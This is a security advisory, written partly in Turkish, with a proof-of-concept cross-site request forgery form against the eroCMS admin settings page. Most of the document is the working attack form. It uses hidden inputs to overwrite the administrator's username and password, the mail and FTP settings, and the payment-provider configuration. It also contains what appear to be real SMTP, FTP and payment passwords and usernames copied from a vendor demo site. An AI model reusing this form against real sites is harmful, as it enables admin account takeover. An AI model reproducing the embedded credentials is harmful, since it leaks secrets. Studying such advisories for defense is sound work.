< ------------------- header data start ------------------- >


#############################################################


# Application Name : eroCMS


# Vulnerability Type : XSRF (Cross-Site Request Forgery)


# Infection : Uzaktan otomatik olarak user bilgileri degistirilebilir.


# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.


# author : http://demo.erocms.net/admin/index.php?site=settings


#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >


<!--
  Proof-of-concept form for the advisory above.

  It POSTs to the admin settings page (index.php?site=settings) with every
  settings field supplied as a hidden input, so that a logged-in administrator
  who submits (or is tricked into submitting) it overwrites the site
  configuration with the values below. The advisory's stated root cause is that
  the handler accepts this request without a per-session anti-CSRF token and
  without asking for the current password; those two checks are the fix it
  recommends.

  Placeholders used by the author (Turkish): hedefsite.com/SCRIPTYOLU =
  target host / install path, KULLANICIADI = username, SIFRENIZ = your
  password, BUTONADI = button label.
-->
<form name=formular action=http://hedefsite.com/SCRIPTYOLU/admin/index.php?site=settings method=post enctype=multipart/form-data>
<!-- Admin account fields: with no old-password check these are directly replaced. -->
<input type=hidden name=username value=KULLANICIADI size=60 />
<input type=hidden name=password value=SIFRENIZ size=60 />
<input type=hidden name=wartung size=60 />
<input type=hidden name=wartung_headline value=W size=60 />
<input type=hidden name=wartung_text value=bild und video bearbeitung size=60 />
<input type=hidden name=amateur_name value=geile Pussy size=60 />
<input type=hidden name=reset_pn />
<textarea style=width:1px; height:1px name=welcome_pn>test seite </hiddenarea>
<input type=hidden name=email_bei_pn checked=checked size=60 />
<input type=hidden name=email value=[email protected] size=60 />
<input type=hidden name=absender value=eroCMS size=60 />
<!--
  NOTE(review): the smtp_*, ftp_* and *_pass values below look like they were
  copied verbatim from the vendor demo install (demo.erocms.net) rather than
  replaced with placeholders. An advisory should not carry live-looking
  credentials; treat them as leaked and rotate if they were ever real.
-->
<input type=hidden name=smtp_host value=mail.erocms.net size=60 />
<input type=hidden name=smtp_user value=web1p1 size=60 />
<input type=hidden name=smtp_pass value=Nordin81 size=60 />
<input type=hidden name=smtp_auth checked=checked size=60 />
<input type=hidden name=ftp_host value=demo.erocms.net size=60 />
<input type=hidden name=ftp_port value= size=60 />
<input type=hidden name=ftp_user value=web1 size=60 />
<input type=hidden name=ftp_pass value=Nordin81 size=60 />
<input type=hidden name=ftp_path value=/html/demo/upload/temp size=60 />
<!-- Payment-provider / bonus settings: attacker-controlled values here redirect revenue configuration. -->
<input type=hidden name=is_sue checked=checked size=60 />
<input type=hidden name=sue_kundenid value=0 size=60 />
<input type=hidden name=sue_projektid value=0 size=60 />
<input type=hidden name=sue_pass value=localhost size=60 />
<input type=hidden name=sue_bonus_10 value=0 size=60 />
<input type=hidden name=sue_bonus_25 value=3 size=60 />
<input type=hidden name=sue_bonus_50 value=6 size=60 />
<input type=hidden name=sue_bonus_100 value=10 size=60 />
<input type=hidden name=sue_bonus_150 value=15 size=60 />
<input type=hidden name=sue_bonus_200 value=20 size=60 />
<input type=hidden name=is_sl checked=checked size=60 />
<input type=hidden name=sl_projektid value=78410 size=60 />
<input type=hidden name=sl_pass value=Nordin81 size=60 />
<input type=hidden name=sl_bonus_10 value=10 size=60 />
<input type=hidden name=sl_bonus_25 value=25 size=60 />
<input type=hidden name=sl_bonus_50 value=50 size=60 />
<input type=hidden name=sl_bonus_100 value=100 size=60 />
<input type=hidden name=sl_bonus_150 value=150 size=60 />
<input type=hidden name=sl_bonus_200 value=200 size=60 />
<input type=hidden name=is_netdebit checked=checked size=60 />
<input type=hidden name=is_netdebit_testmodus size=60 />
<input type=hidden name=netdebit_partner_id value=0 size=60 />
<input type=hidden name=netdebit_content_id value=0 size=60 />
<input type=hidden name=netdebit_webmaster_id value=0 size=60 />
<input type=hidden name=is_cab checked=checked size=60 />
<input type=hidden name=cab_id value=0 size=60 />
<input type=hidden name=cab_link value= size=60 />
<input type=hidden name=adress_daten size=60 />
<input type=hidden name=coins value=0 size=60 />
<!-- Site display / feature toggles and SEO metadata. -->
<input type=hidden name=bilderrotation checked=checked size=60 />
<input type=hidden name=videothek_on_off checked=checked size=60 />
<input type=hidden name=vorschaltseite size=60 />
<input type=hidden name=ueber18 size=60 />
<input type=hidden name=is_impress size=60 />
<input type=hidden name=header_onoff checked=checked size=60 />
<input type=hidden name=regmail checked=checked size=60 />
<input type=hidden name=friends checked=checked size=60 />
<select name=templates size=1><option value=candyallover >candyallover</option></select>
<input type=hidden name=url value=demo.erocms.net size=60 />
<textarea style=width:500px; height:150px; name=meta_header cols=5 rows=5></textarea>
<input type=hidden name=title value=eroCMS size=60 />
<input type=hidden name=keywords value=eroCMS, size=60 />
<input type=hidden name=description value=eroCMS size=60 />
<!-- Mitigation (from the advisory header): the handler should bind this submit to a session token and require the current password. -->
<input type=submit name=submit_settings value=BUTONADI />
</form>


< -- bug code end of -- >